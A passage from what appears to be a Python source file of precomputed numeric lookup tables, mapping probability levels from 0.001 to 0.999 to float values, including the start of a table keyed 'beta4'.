0.6225530423486144, 0.271: 0.6231403103016593, 0.272: 0.6237262824262815, 0.273: 0.624310967902731, 0.274: 0.624894375820968, 0.275: 0.6254765151819087, 0.276: 0.6260573948986715, 0.277: 0.6266370237977733, 0.278: 0.627215410620342, 0.279: 0.6277925640232481, 0.28: 0.6283684925803023, 0.281: 0.628943204783341, 0.282: 0.629516709043367, 0.283: 0.6300890136916307, 0.284: 0.6306601269807006, 0.285: 0.6312300570855304, 0.286: 0.6317988121044862, 0.287: 0.6323664000603757, 0.288: 0.6329328289014384, 0.289: 0.633498106502367, 0.29: 0.6340622406652381, 0.291: 0.6346252391204967, 0.292: 0.6351871095278874, 0.293: 0.6357478594773636, 0.294: 0.6363074964900378, 0.295: 0.6368660280190218, 0.296: 0.6374234614503631, 0.297: 0.6379798041038829, 0.298: 0.6385350632340105, 0.299: 0.6390892460306717, 0.3: 0.6396423596200767, 0.301: 0.6401944110655492, 0.302: 0.6407454073683171, 0.303: 0.6412953554683015, 0.304: 0.6418442622449138, 0.305: 0.6423921345177895, 0.306: 0.6429389790475577, 0.307: 0.6434848025365723, 0.308: 0.644029611629644, 0.309: 0.6445734129147622, 0.31: 0.6451162129237973, 0.311: 0.6456580181331952, 0.312: 0.6461988349646632, 0.313: 0.6467386697858525, 0.314: 0.6472775289110052, 0.315: 0.6478154186016275, 0.316: 0.6488883144654416, 0.317: 0.6488883144654416, 0.318: 0.6499574064387202, 0.319: 0.6499574064387202, 0.32: 0.6510227427792847, 0.321: 0.6510227427792847, 0.322: 0.6520843709606412, 0.323: 0.6520843709606412, 0.324: 0.6531423376907116, 0.325: 0.6531423376907116, 0.326: 0.6541966889300284, 0.327: 0.6541966889300284, 0.328: 0.655247469909402, 0.329: 0.655247469909402, 0.33: 0.6562947251470874, 0.331: 0.6562947251470874, 0.332: 0.6573384984654542, 0.333: 0.6573384984654542, 0.334: 0.6583788330071836, 0.335: 0.6583788330071836, 0.336: 0.6594157712510555, 0.337: 0.6594157712510555, 0.338: 0.6604493550272211, 0.339: 0.6604493550272211, 0.34: 0.6614796255321204, 0.341: 0.6614796255321204, 0.342: 0.6625066233429459, 0.343: 0.6625066233429459, 0.344: 0.663018907502609, 0.345: 0.6635303884317454, 0.346: 0.6640410710345586, 0.347: 0.6645509601791186, 0.348: 0.6650600606977741, 0.349: 0.6655683773875551, 0.35: 0.6660759150105728, 0.351: 0.6665826782944113, 0.352: 0.6670886719325101, 0.353: 0.6675939005845511, 0.354: 0.6680983688768286, 0.355: 0.6686020814026354, 0.356: 0.6691050427226102, 0.357: 0.6696072573651206, 0.358: 0.6701087298265976, 0.359: 0.6706094645719106, 0.36: 0.6711094660346952, 0.361: 0.6716087386177194, 0.362: 0.6721072866932013, 0.363: 0.672605114603156, 0.364: 0.6731022266597249, 0.365: 0.673598627145503, 0.366: 0.6740943203138587, 0.367: 0.6745893103892513, 0.368: 0.6750836015675439, 0.369: 0.675577198016321, 0.37: 0.6760701038751914, 0.371: 0.6765623232560871, 0.372: 0.6770538602435703, 0.373: 0.6775447188951182, 0.374: 0.6780349032414232, 0.375: 0.6785244172866713, 0.376: 0.6790132650088415, 0.377: 0.6795014503599768, 0.378: 0.6799889772664565, 0.379: 0.6804758496292819, 0.38: 0.6809620713243425, 0.381: 0.6814476462026801, 0.382: 0.681932578090763, 0.383: 0.6824168707907288, 0.384: 0.6829005280806688, 0.385: 0.6833835537148568, 0.386: 0.6838659514240226, 0.387: 0.6843477249155834, 0.388: 0.6848288778739036, 0.389: 0.6853094139605289, 0.39: 0.6857893368144322, 0.391: 0.6862686500522506, 0.392: 0.686747357268519, 0.393: 0.6872254620359026, 0.394: 0.687702967905425, 0.395: 0.688179878406694, 0.396: 0.688656197048134, 0.397: 0.6891319273171946, 0.398: 0.6896070726805891, 0.399: 0.6900816365844882, 0.4: 0.6905556224547547, 0.401: 0.6910290336971351, 0.402: 0.6915018736974954, 0.403: 0.6919741458219966, 0.404: 0.6924458534173312, 0.405: 0.692916999810907, 0.406: 0.6933875883110421, 0.407: 0.693857622207189, 0.408: 0.6943271047701068, 0.409: 0.6947960392520569, 0.41: 0.6952644288870155, 0.411: 0.6957322768908354, 0.412: 0.6961995864614565, 0.413: 0.6966663607790745, 0.414: 0.6971326030063474, 0.415: 0.6975983162885411, 0.416: 0.6980635037537497, 0.417: 0.6985281685130438, 0.418: 0.6989923136606674, 0.419: 0.6994559422741938, 0.42: 0.699919057414716, 0.421: 0.7003816621269993, 0.422: 0.700843759439666, 0.423: 0.7013053523653541, 0.424: 0.7017664439008835, 0.425: 0.702227037027428, 0.426: 0.7026871347106631, 0.427: 0.7031467399009421, 0.428: 0.7036058555334419, 0.429: 0.7040644845283315, 0.43: 0.7045226297909155, 0.431: 0.70498029421181, 0.432: 0.7054374806670598, 0.433: 0.7058941920183321, 0.434: 0.7063504311130315, 0.435: 0.7068062007844735, 0.436: 0.7072615038520105, 0.437: 0.7077163431211877, 0.438: 0.7081707213838986, 0.439: 0.7086246414185028, 0.44: 0.7090781059899909, 0.441: 0.7099836797374939, 0.442: 0.7099836797374939, 0.443: 0.7108874644840137, 0.444: 0.7108874644840137, 0.445: 0.7117894818819261, 0.446: 0.7117894818819261, 0.447: 0.7126897533826833, 0.448: 0.7126897533826833, 0.449: 0.713588300241041, 0.45: 0.713588300241041, 0.451: 0.7144851435191959, 0.452: 0.7144851435191959, 0.453: 0.7153803040908813, 0.454: 0.7153803040908813, 0.455: 0.7162738026453555, 0.456: 0.7162738026453555, 0.457: 0.7171656596913379, 0.458: 0.7171656596913379, 0.459: 0.7180558955609, 0.46: 0.7180558955609, 0.461: 0.7189445304132334, 0.462: 0.7189445304132334, 0.463: 0.7198315842384235, 0.464: 0.7198315842384235, 0.465: 0.7207170768611065, 0.466: 0.7207170768611065, 0.467: 0.7216010279440989, 0.468: 0.7216010279440989, 0.469: 0.7220424315094723, 0.47: 0.7224834569919608, 0.471: 0.7229241068054837, 0.472: 0.7233643833544984, 0.473: 0.7238042890341194, 0.474: 0.7242438262302121, 0.475: 0.7246829973195117, 0.476: 0.7251218046697115, 0.477: 0.7255602506395729, 0.478: 0.7259983375790399, 0.479: 0.7264360678293225, 0.48: 0.7268734437230076, 0.481: 0.727310467584157, 0.482: 0.7277471417284112, 0.483: 0.7281834684630808, 0.484: 0.7286194500872518, 0.485: 0.7290550888918857, 0.486: 0.7294903871599046, 0.487: 0.729925347166297, 0.488: 0.7303599711782167, 0.489: 0.7307942614550686, 0.49: 0.7312282202486056, 0.491: 0.731661849803029, 0.492: 0.7320951523550754, 0.493: 0.7325281301341102, 0.494: 0.7329607853622234, 0.495: 0.7333931202543144, 0.496: 0.7338251370181907, 0.497: 0.7342568378546537, 0.498: 0.7346882249575918, 0.499: 0.7351193005140648, 0.5: 0.7355500667043946, 0.501: 0.7359805257022629, 0.502: 0.736410679674782, 0.503: 0.7368405307825945, 0.504: 0.7372700811799572, 0.505: 0.7376993330148248, 0.506: 0.7381282884289455, 0.507: 0.7385569495579267, 0.508: 0.7389853185313442, 0.509: 0.7394133974728119, 0.51: 0.7398411885000629, 0.511: 0.7402686937250471, 0.512: 0.7406959152540055, 0.513: 0.741122855187553, 0.514: 0.7415495156207655, 0.515: 0.7419758986432556, 0.516: 0.7424020063392585, 0.517: 0.7428278407877171, 0.518: 0.7432534040623593, 0.519: 0.7436786982317708, 0.52: 0.7441037253594894, 0.521: 0.7445284875040802, 0.522: 0.7449529867192101, 0.523: 0.7453772250537332, 0.524: 0.745801204551769, 0.525: 0.7462249272527776, 0.526: 0.7466483951916411, 0.527: 0.7470716103987431, 0.528: 0.7474945749000428, 0.529: 0.74791729071716, 0.53: 0.748339759867439, 0.531: 0.7487619843640451, 0.532: 0.7491839662160209, 0.533: 0.7500272100021748, 0.534: 0.7504484759345688, 0.535: 0.750869507218928, 0.536: 0.7512903058448795, 0.537: 0.7517108737983949, 0.538: 0.7521312130618715, 0.539: 0.7525513256141956, 0.54: 0.7529712134308282, 0.541: 0.7533908784838732, 0.542: 0.7538103227421544, 0.543: 0.754229548171289, 0.544: 0.7546485567337676, 0.545: 0.7550673503890208, 0.546: 0.7554859310934963, 0.547: 0.7559043008007363, 0.548: 0.7563224614614448, 0.549: 0.7567404150235721, 0.55: 0.7571581634323776, 0.551: 0.7575757086305109, 0.552: 0.7579930525580765, 0.553: 0.7584101971527252, 0.554: 0.7588271443497, 0.555: 0.7592438960819415, 0.556: 0.7596604542801327, 0.557: 0.7600768208727952, 0.558: 0.7604929977863476, 0.559: 0.7609089869451785, 0.56: 0.7613247902717337, 0.561: 0.7617404096865756, 0.562: 0.7621558471084606, 0.563: 0.7621558471084606, 0.564: 0.7625711044544199, 0.565: 0.7629861836398162, 0.566: 0.7634010865784351, 0.567: 0.7638158151825467, 0.568: 0.7642303713629843, 0.569: 0.7646447570292122, 0.57: 0.7650589740894096, 0.571: 0.7654730244505318, 0.572: 0.7658869100183937, 0.573: 0.7663006326977352, 0.574: 0.7667141943923046, 0.575: 0.7671275970049194, 0.576: 0.767540842437554, 0.577: 0.7679539325914064, 0.578: 0.7683668693669741, 0.579: 0.7687796546641252, 0.58: 0.7691922903821782, 0.581: 0.7696047784199711, 0.582: 0.7700171206759436, 0.583: 0.7704293190482026, 0.584: 0.7708413754346044, 0.585: 0.7712532917328274, 0.586: 0.7716650698404466, 0.587: 0.7720767116550123, 0.588: 0.7724882190741225, 0.589: 0.7728995939955002, 0.59: 0.773310838317069, 0.591: 0.773721953937033, 0.592: 0.7741329427539492, 0.593: 0.7745438066668062, 0.594: 0.7749545475750999, 0.595: 0.775365167378917, 0.596: 0.7757756679790029, 0.597: 0.7761860512768476, 0.598: 0.7765963191747626, 0.599: 0.7770064735759555, 0.6: 0.7774165163846163, 0.601: 0.7778264495059879, 0.602: 0.7782362748464531, 0.603: 0.7786459943136105, 0.604: 0.7790556098163555, 0.605: 0.7794651232649613, 0.606: 0.7798745365711616, 0.607: 0.7802838516482298, 0.608: 0.7806930704110627, 0.609: 0.7811021947762602, 0.61: 0.7815112266622087, 0.611: 0.7819201679891684, 0.612: 0.7823290206793507, 0.613: 0.7827377866570054, 0.614: 0.7831464678485047, 0.615: 0.7835550661824275, 0.616: 0.7839635835896478, 0.617: 0.7843720220034165, 0.618: 0.7847803833594487, 0.619: 0.7851886695960131, 0.62: 0.7855968826540182, 0.621: 0.786005024477099, 0.622: 0.786413097011708, 0.623: 0.7868211022072011, 0.624: 0.7872290420159306, 0.625: 0.7876369183933362, 0.626: 0.7880447332980294, 0.627: 0.7884524886918934, 0.628: 0.7888601865401708, 0.629: 0.7892678288115562, 0.63: 0.7896754174782934, 0.631: 0.7900829545162642, 0.632: 0.7904904419050889, 0.633: 0.7908978816282177, 0.634: 0.791305275673029, 0.635: 0.7917126260309262, 0.636: 0.7921199346974361, 0.637: 0.7925272036723071, 0.638: 0.7929344349596062, 0.639: 0.7933416305678247, 0.64: 0.7937487925099744, 0.641: 0.7941559228036911, 0.642: 0.7945630234713377, 0.643: 0.794970096540108, 0.644: 0.7953771440421287, 0.645: 0.79578416801457, 0.646: 0.796191170499746, 0.647: 0.7965981535452262, 0.648: 0.7970051192039411, 0.649: 0.7974120695342927, 0.65: 0.7978190066002653, 0.651: 0.7982259324715344, 0.652: 0.7986328492235822, 0.653: 0.7990397589378074, 0.654: 0.7994466637016426, 0.655: 0.7998535656086684, 0.656: 0.8002604667587291, 0.657: 0.8006673692580524, 0.658: 0.8014811867620207, 0.659: 0.8018881060121092, 0.66: 0.8022950351025896, 0.661: 0.8027019761734091, 0.662: 0.8031089313716283, 0.663: 0.803515902851549, 0.664: 0.803922892774841, 0.665: 0.8043299033106696, 0.666: 0.8047369366358303, 0.667: 0.805143994934877, 0.668: 0.805551080400256, 0.669: 0.80595819523244, 0.67: 0.8063653416400667, 0.671: 0.8067725218400744, 0.672: 0.8071797380578409, 0.673: 0.807586992527326, 0.674: 0.8079942874912138, 0.675: 0.8084016252010561, 0.676: 0.8088090079174157, 0.677: 0.8092164379100194, 0.678: 0.8096239174579022, 0.679: 0.8100314488495599, 0.68: 0.8104390343831015, 0.681: 0.8108466763664051, 0.682: 0.8112543771172726, 0.683: 0.8116621389635872, 0.684: 0.8120699642434749, 0.685: 0.8124778553054687, 0.686: 0.812885814508668, 0.687: 0.8132938442229097, 0.688: 0.8132938442229097, 0.689: 0.8137019468289306, 0.69: 0.8141101247185454, 0.691: 0.8145183802948126, 0.692: 0.8149267159722117, 0.693: 0.8153351341768218, 0.694: 0.8157436373464985, 0.695: 0.8161522279310555, 0.696: 0.8165609083924505, 0.697: 0.8169696812049714, 0.698: 0.8173785488554234, 0.699: 0.817787513843319, 0.7: 0.8181965786810788, 0.701: 0.81860574589422, 0.702: 0.8190150180215611, 0.703: 0.8194243976154219, 0.704: 0.8198338872418283, 0.705: 0.8202434894807192, 0.706: 0.8206532069261581, 0.707: 0.8210630421865471, 0.708: 0.8214729978848386, 0.709: 0.8218830766587641, 0.71: 0.8222932811610467, 0.711: 0.8227036140596329, 0.712: 0.8231140780379193, 0.713: 0.8235246757949855, 0.714: 0.8239354100458285, 0.715: 0.8243462835216071, 0.716: 0.8247572989698749, 0.717: 0.8251684591548364, 0.718: 0.8255797668575894, 0.719: 0.8259912248763827, 0.72: 0.8264028360268721, 0.721: 0.82681460314238, 0.722: 0.8272265290741677, 0.723: 0.8276386166916927, 0.724: 0.8280508688828925, 0.725: 0.8284632885544565, 0.726: 0.8288758786321117, 0.727: 0.829288642060904, 0.728: 0.829701581805491, 0.729: 0.8301147008504408, 0.73: 0.8305280022005292, 0.731: 0.8309414888810429, 0.732: 0.8313551639380885, 0.733: 0.8317690304389093, 0.734: 0.832183091472205, 0.735: 0.8325973501484578, 0.736: 0.8330118096002533, 0.737: 0.8334264729826311, 0.738: 0.8338413434734111, 0.739: 0.8342564242735487, 0.74: 0.8346717186074828, 0.741: 0.8350872297234988, 0.742: 0.835502960894084, 0.743: 0.8359189154163078, 0.744: 0.836335096612192, 0.745: 0.8367515078290969, 0.746: 0.8371681524401079, 0.747: 0.8375850338444296, 0.748: 0.8380021554677974, 0.749: 0.8384195207628786, 0.75: 0.8388371332096949, 0.751: 0.839254996316041, 0.752: 0.8396731136179256, 0.753: 0.84009148868, 0.754: 0.8405101250960147, 0.755: 0.8409290264892669, 0.756: 0.8413481965130679, 0.757: 0.8417676388512205, 0.758: 0.8421873572184837, 0.759: 0.8426073553610762, 0.76: 0.8430276370571695, 0.761: 0.8434482061173915, 0.762: 0.8438690663853534, 0.763: 0.8442902217381587, 0.764: 0.844711676086954, 0.765: 0.8451334333774695, 0.766: 0.8455554975905712, 0.767: 0.8464005628871285, 0.768: 0.8468235721131693, 0.769: 0.8472469045481636, 0.77: 0.8476705643574003, 0.771: 0.8480945557448651, 0.772: 0.8485188829538903, 0.773: 0.8489435502677997, 0.774: 0.8493685620105581, 0.775: 0.8497939225474583, 0.776: 0.8502196362858021, 0.777: 0.8506457076755949, 0.778: 0.851072141210278, 0.779: 0.8514989414274313, 0.78: 0.8519261129095379, 0.781: 0.8523536602847411, 0.782: 0.852781588227601, 0.783: 0.853209901459908, 0.784: 0.8536386047514757, 0.785: 0.854067702920964, 0.786: 0.8544972008367249, 0.787: 0.8549271034176584, 0.788: 0.8553574156340878, 0.789: 0.8557881425086524, 0.79: 0.8562192891172231, 0.791: 0.8566508605898439, 0.792: 0.8570828621116668, 0.793: 0.857515298923939, 0.794: 0.8579481763250044, 0.795: 0.8583814996712956, 0.796: 0.858815274378404, 0.797: 0.8592495059221108, 0.798: 0.8596841998395001, 0.799: 0.8601193617300558, 0.8: 0.8605549972567834, 0.801: 0.860991112147404, 0.802: 0.8614277121955056, 0.803: 0.8618648032617768, 0.804: 0.862302391275245, 0.805: 0.8627404822345398, 0.806: 0.8631790822091976, 0.807: 0.8636181973409898, 0.808: 0.8640578338452893, 0.809: 0.8644979980124431, 0.81: 0.8649386962092287, 0.811: 0.8653799348802875, 0.812: 0.8658217205496228, 0.813: 0.8658217205496228, 0.814: 0.8662640598221462, 0.815: 0.8667069593852249, 0.816: 0.8671504260102983, 0.817: 0.8675944665545221, 0.818: 0.8680390879624442, 0.819: 0.868484297267744, 0.82: 0.8689301015949923, 0.821: 0.8693765081614677, 0.822: 0.8698235242790151, 0.823: 0.8702711573559507, 0.824: 0.8707194148990185, 0.825: 0.8711683045153991, 0.826: 0.8716178339147624, 0.827: 0.8720680109113631, 0.828: 0.8725188434262364, 0.829: 0.8729703394893837, 0.83: 0.8734225072420762, 0.831: 0.8738753549391953, 0.832: 0.8743288909516078, 0.833: 0.8747831237686716, 0.834: 0.8752380620007343, 0.835: 0.8756937143817536, 0.836: 0.8761500897719717, 0.837: 0.8766071971606508, 0.838: 0.8770650456689086, 0.839: 0.8775236445525976, 0.84: 0.8779830032053098, 0.841: 0.8784431311614472, 0.842: 0.87890403809934, 0.843: 0.8793657338445258, 0.844: 0.8798282283730703, 0.845: 0.8802915318150021, 0.846: 0.8807556544578454, 0.847: 0.8812206067502519, 0.848: 0.8816863993057594, 0.849: 0.8821530429066325, 0.85: 0.8826205485078215, 0.851: 0.8830889272410779, 0.852: 0.8835581904191525, 0.853: 0.8840283495401449, 0.854: 0.8844994162919538, 0.855: 0.8849714025569239, 0.856: 0.8854443204165868, 0.857: 0.885918182156552, 0.858: 0.8863930002715902, 0.859: 0.8868687874708521, 0.86: 0.8873455566832378, 0.861: 0.8878233210629703, 0.862: 0.8883020939953478, 0.863: 0.8887818891026656, 0.864: 0.8892627202503346, 0.865: 0.889744601553215, 0.866: 0.8902275473821786, 0.867: 0.8907115723708232, 0.868: 0.89119669142251, 0.869: 0.8916829197175793, 0.87: 0.8921702727208111, 0.871: 0.8926587661891863, 0.872: 0.8931484161798863, 0.873: 0.8936392390585964, 0.874: 0.894131251508071, 0.875: 0.8946244705370525, 0.876: 0.8951189134894744, 0.877: 0.895614598054019, 0.878: 0.8961115422740262, 0.879: 0.8966097645577332, 0.88: 0.8971092836889663, 0.881: 0.8976101188381802, 0.882: 0.8981122895739193, 0.883: 0.8986158158747501, 0.884: 0.8996270172107048, 0.885: 0.9001347343668029, 0.886: 0.9006438913571762, 0.887: 0.9011545104060396, 0.888: 0.9016666142295524, 0.889: 0.9021802260514752, 0.89: 0.9026953696194422, 0.891: 0.9032120692219234, 0.892: 0.9037303497058868, 0.893: 0.9042502364952025, 0.894: 0.9047717556098503, 0.895: 0.9052949336859292, 0.896: 0.9058197979965497, 0.897: 0.9063463764736668, 0.898: 0.9068746977307942, 0.899: 0.907404791086872, 0.9: 0.9079366865910729, 0.901: 0.9084704150488361, 0.902: 0.9090060080490603, 0.903: 0.9095434979925788, 0.904: 0.910082918121967, 0.905: 0.910624302552747, 0.906: 0.9111676863061664, 0.907: 0.9117131053434584, 0.908: 0.9122605966018961, 0.909: 0.9128101980325561, 0.91: 0.9133619486400298, 0.911: 0.9139158885240886, 0.912: 0.9144720589236099, 0.913: 0.915030502262612, 0.914: 0.9155912621989051, 0.915: 0.9161543836751155, 0.916: 0.916719912972671, 0.917: 0.9172878977685587, 0.918: 0.9178583871953134, 0.919: 0.9184314319042856, 0.92: 0.91900708413253, 0.921: 0.9195853977735284, 0.922: 0.9201664284519813, 0.923: 0.920750233602964, 0.924: 0.921336872555888, 0.925: 0.9219264066234327, 0.926: 0.9225188991959647, 0.927: 0.9231144158417716, 0.928: 0.9237130244135927, 0.929: 0.9243147951619725, 0.93: 0.9249198008559241, 0.931: 0.9255281169114625, 0.932: 0.9261398215287105, 0.933: 0.9267549958382909, 0.934: 0.9273737240577397, 0.935: 0.92799609365872, 0.936: 0.928622195546219, 0.937: 0.9292521242504579, 0.938: 0.9292521242504579, 0.939: 0.9298859781328668, 0.94: 0.9305238596073836, 0.941: 0.931165875378347, 0.942: 0.9318121366967276, 0.943: 0.9324627596362657, 0.944: 0.9331178653916035, 0.945: 0.933777580600472, 0.946: 0.9344420376924215, 0.947: 0.9351113752667268, 0.948: 0.9357857385026679, 0.949: 0.9364652796054211, 0.95: 0.937150158291647, 0.951: 0.9378405423189374, 0.952: 0.9385366080642967, 0.953: 0.9392385411571911, 0.954: 0.9399465371734812, 0.955: 0.9406608023978891, 0.956: 0.9413815546631431, 0.957: 0.9421090242753994, 0.958: 0.9428434550374909, 0.959: 0.9435851053822989, 0.96: 0.9443342496316968, 0.961: 0.9450911793978888, 0.962: 0.945856205148016, 0.963: 0.9466296579552712, 0.964: 0.9474118914646792, 0.965: 0.9482032841068802, 0.966: 0.9490042415986161, 0.967: 0.9498151997772327, 0.968: 0.9506366278252294, 0.969: 0.9514690319520888, 0.97: 0.9523129596160298, 0.971: 0.9531690043849087, 0.972: 0.9540378115592142, 0.973: 0.9549200847079529, 0.974: 0.9558165933058685, 0.975: 0.9567281817072483, 0.976: 0.9576557797538003, 0.977: 0.9586004153958916, 0.978: 0.9595632298144803, 0.979: 0.9605454956773251, 0.98: 0.961548639362179, 0.981: 0.9625742682534052, 0.982: 0.9636242046045878, 0.983: 0.9647005280060533, 0.984: 0.9658056292907885, 0.985: 0.9669422798859362, 0.986: 0.9681137223883007, 0.987: 0.969323790886672, 0.988: 0.9705770739195563, 0.989: 0.9718791401261718, 0.99: 0.9732368588572403, 0.991: 0.9746588696894386, 0.992: 0.9761562952386755, 0.993: 0.9777438717615068, 0.994: 0.9794418425593265, 0.995: 0.9812793568951739, 0.996: 0.9833011613491072, 0.997: 0.9855825957791874, 0.998: 0.9882705907872608, 0.999: 0.9917445572122447}, # skipcq: FLK-E231, FLK-E501 'beta4': {0.001: 0.00019998005804071128, 0.002: 0.0004002204045574647, 0.003: 0.0006006213287669104, 0.004: 0.0008011831206943514, 0.005: 0.0010019060711810082, 0.006: 0.0012027904718907045, 0.007: 0.0014038366153058955, 0.008: 0.001605044794729051, 0.009: 0.0018064153042957605, 0.01: 0.002007948438980501, 0.011: 0.0022096444945776577, 0.012: 0.002411503767724943, 0.013: 0.0026135265559143867, 0.014: 0.0028157131574584517, 0.015: 0.003018063871538153, 0.016: 0.003220578998168856, 0.017: 0.0034232588382341047, 0.018: 0.0036261036934598237, 0.019: 0.0038291138664526846, 0.02: 0.00403228966066378, 0.021: 0.0042356313804248705, 0.022: 0.004439139330928271, 0.023: 0.004642813818244524, 0.024: 0.004846655149330454, 0.025: 0.0050506636320080825, 0.026: 0.005254839574995085, 0.027: 0.005459183287890954, 0.028: 0.005663695081191499, 0.029: 0.005868375266289406, 0.03: 0.006073224155463766, 0.031: 0.006278242061907052, 0.032: 0.0064834292997097125, 0.033: 0.00668878618387534, 0.034: 0.006894313030321713, 0.035: 0.007100010155878011, 0.036: 0.007305877878297563, 0.037: 0.007511916516250114, 0.038: 0.007718126389340973, 0.039: 0.007924507818096463, 0.04: 0.008131061123992048, 0.041: 0.008337786629420182, 0.042: 0.008544684657735183, 0.043: 0.008751755533227578, 0.044: 0.008958999581128573, 0.045: 0.009166417127646475, 0.046: 0.009374008499919767, 0.047: 0.009581774026066928, 0.048: 0.009789714035155795, 0.049: 0.009997828857236844, 0.05: 0.010206118823319751, 0.051: 0.010414584265399651, 0.052: 0.010623225516449099, 0.053: 0.010832042910421927, 0.054: 0.01104103678226016, 0.055: 0.011250207467897311, 0.056: 0.01145955530427429, 0.057: 0.011669080629309344, 0.058: 0.011878783781943972, 0.059: 0.012088665102121407, 0.06: 0.012298724930791, 0.061: 0.012508963609927542, 0.062: 0.012719381482517458, 0.063: 0.012929978892580032, 0.064: 0.013140756185157917, 0.065: 0.01335171370632152, 0.066: 0.013562851803192999, 0.067: 0.013774170823917384, 0.068: 0.013985671117698075, 0.069: 0.014197353034783821, 0.07: 0.014409216926473003, 0.071: 0.014621263145133328, 0.072: 0.01483349204417878, 0.073: 0.015045903978106762, 0.074: 0.015258499302476039, 0.075: 0.015471278373926986, 0.076: 0.01568424155017064, 0.077: 0.015897389190005436, 0.078: 0.01611072165333038, 0.079: 0.016324239301124484, 0.08: 0.01653794249546798, 0.081: 0.016751831599545276, 0.082: 0.016965906977645433, 0.083: 0.017180168995179712, 0.084: 0.017394618018656167, 0.085: 0.01760925441572233, 0.086: 0.017824078555136243, 0.087: 0.018039090806796672, 0.088: 0.018254291541735704, 0.089: 0.018469681132123033, 0.09: 0.018685259951271547, 0.091: 0.018901028373641923, 0.092: 0.019116986774852813, 0.093: 0.0193331355316856, 0.094: 0.019549475022072865, 0.095: 0.019766005625124154, 0.096: 0.01998272772112894, 0.097: 0.020199641691539552, 0.098: 0.020416747919000798, 0.099: 0.020634046787345282, 0.1: 0.020851538681598076, 0.101: 0.02106922398798212, 0.102: 0.021287103093923336, 0.103: 0.021505176388065678, 0.104: 0.021723444260250448, 0.105: 0.021941907101542327, 0.106: 0.02216056530424554, 0.107: 0.022379419261869652, 0.108: 0.022598469369177705, 0.109: 0.02281771602215995, 0.11: 0.023037159618063352, 0.111: 0.02325680055536784, 0.112: 0.023476639233836444, 0.113: 0.023696676054460984, 0.114: 0.023916911419520945, 0.115: 0.024137345732567095, 0.116: 0.024357979398413047, 0.117: 0.024578812823170336, 0.118: 0.024799846414236285, 0.119: 0.0250210805802904, 0.12: 0.025242515731326447, 0.121: 0.0254641522786387, 0.122: 0.02568599063482206, 0.123: 0.025908031213808094, 0.124: 0.026130274430829985, 0.125: 0.02635272070246037, 0.126: 0.02657537044660458, 0.127: 0.026798224082502403, 0.128: 0.027021282030743367, 0.129: 0.027244544713269807, 0.13: 0.02746801255337056, 0.131: 0.027691685975712928, 0.132: 0.027915565406323926, 0.133: 0.028139651272603407, 0.134: 0.028363944003336493, 0.135: 0.028588444028694697, 0.136: 0.028813151780242848, 0.137: 0.029038067690943345, 0.138: 0.029263192195163414, 0.139: 0.02948852572869147, 0.14: 0.029714068728718238, 0.141: 0.02993982163386695, 0.142: 0.030165784884191738, 0.143: 0.03039195892118548, 0.144: 0.03061834418777528, 0.145: 0.03084494112834553, 0.146: 0.031071750188734898, 0.147: 0.03129877181624225, 0.148: 0.031526006459636755, 0.149: 0.03175345456917217, 0.15: 0.0319811165965629, 0.151: 0.032208992995031674, 0.152: 0.03243708421929227, 0.153: 0.03266539072555246, 0.154: 0.0328939129715389, 0.155: 0.03312265141649033, 0.156: 0.033351606521157984, 0.157: 0.03358077874784467, 0.158: 0.033810168560369044, 0.159: 0.0340397764240995, 0.16: 0.034269602805954924, 0.161: 0.03449964817442163, 0.162: 0.03472991299952519, 0.163: 0.034960397752885806, 0.164: 0.035191102907694734, 0.165: 0.0354220289387298, 0.166: 0.035653176322351626, 0.167: 0.03588454553653539, 0.168: 0.036116137060853704, 0.169: 0.036347951376499765, 0.17: 0.036579988966282576, 0.171: 0.03681225031465444, 0.172: 0.037044735907685276, 0.173: 0.03727744623310381, 0.174: 0.03751038178028295, 0.175: 0.03774354304026518, 0.176: 0.0379769305057472, 0.177: 0.038210544671111485, 0.178: 0.03844438603241455, 0.179: 0.038678455087416734, 0.18: 0.03891275233556041, 0.181: 0.03914727827800287, 0.182: 0.03938203341761945, 0.183: 0.03961701825899733, 0.184: 0.039852233308465296, 0.185: 0.04008767907407873, 0.186: 0.040323356065650816, 0.187: 0.04055926479473852, 0.188: 0.040795405774665665, 0.189: 0.041031779520537034, 0.19: 0.04126838654921838, 0.191: 0.041505227379378486, 0.192: 0.041742302531467566, 0.193: 0.04197961252775981, 0.194: 0.04221715789232681, 0.195: 0.042454939151061806, 0.196: 0.04269295683169627, 0.197: 0.042931211463792876, 0.198: 0.043169703578770334, 0.199: 0.04340843370990257, 0.2: 0.04364740239231127, 0.201: 0.04388661016301945, 0.202: 0.044126057560915144, 0.203: 0.044365745126777316, 0.204: 0.04460567340329231, 0.205: 0.04484584293505811, 0.206: 0.04508625426858496, 0.207: 0.04532690795231201, 0.208: 0.04556780453662512, 0.209: 0.0458089445738521, 0.21: 0.04605032861826507, 0.211: 0.04629195722611862, 0.212: 0.04653383095563195, 0.213: 0.046775950367015554, 0.214: 0.04701831602246576, 0.215: 0.047260928486195036, 0.216: 0.047503788324414306, 0.217: 0.047746896105369814, 0.218: 0.04799025239934135, 0.219: 0.04823385777863669, 0.22: 0.04847771281762821, 0.221: 0.04872181809275573, 0.222: 0.0489661741825225, 0.223: 0.049210781667516384, 0.224: 0.049455641130425124, 0.225: 0.049700753156030404, 0.226: 0.04994611833123204, 0.227: 0.05019173724506154, 0.228: 0.05043761048866911, 0.229: 0.05068373865537025, 0.23: 0.0509301223406147, 0.231: 0.051176762142036605, 0.232: 0.051423658659436294, 0.233: 0.05167081249480347, 0.234: 0.05191822425233639, 0.235: 0.05216589453842663, 0.236: 0.05241382396170518, 0.237: 0.05266201313301463, 0.238: 0.052910462665459124, 0.239: 0.05315917317438074, 0.24: 0.05340814527739983, 0.241: 0.05365737959440284, 0.242: 0.0539068767475747, 0.243: 0.05415663736139265, 0.244: 0.05440666206264523, 0.245: 0.054656951480446636, 0.246: 0.05490750624623935, 0.247: 0.05515832699382815, 0.248: 0.05540941435935247, 0.249: 0.05566076898134175, 0.25: 0.055912391500690835, 0.251: 0.056164282560705575, 0.252: 0.056416442807086076, 0.253: 0.05666887288794967, 0.254: 0.056921573453853076, 0.255: 0.05717454515779148, 0.256: 0.05742778865521043, 0.257: 0.05768130460403543, 0.258: 0.05793509366466473, 0.259: 0.05818915649999461, 0.26: 0.05844349377541235, 0.261: 0.05869810615884815, 0.262: 0.058952994320748325, 0.263: 0.05920815893411248, 0.264: 0.05946360067448175, 0.265: 0.05971932021999787, 0.266: 0.059975318251359794, 0.267: 0.060231595451876695, 0.268: 0.06048815250747665, 0.269: 0.060744990106690246, 0.27: 0.061002108940712695, 0.271: 0.061259509703376555, 0.272: 0.061517193091183864, 0.273: 0.06177515980332206, 0.274: 0.0620334105416575, 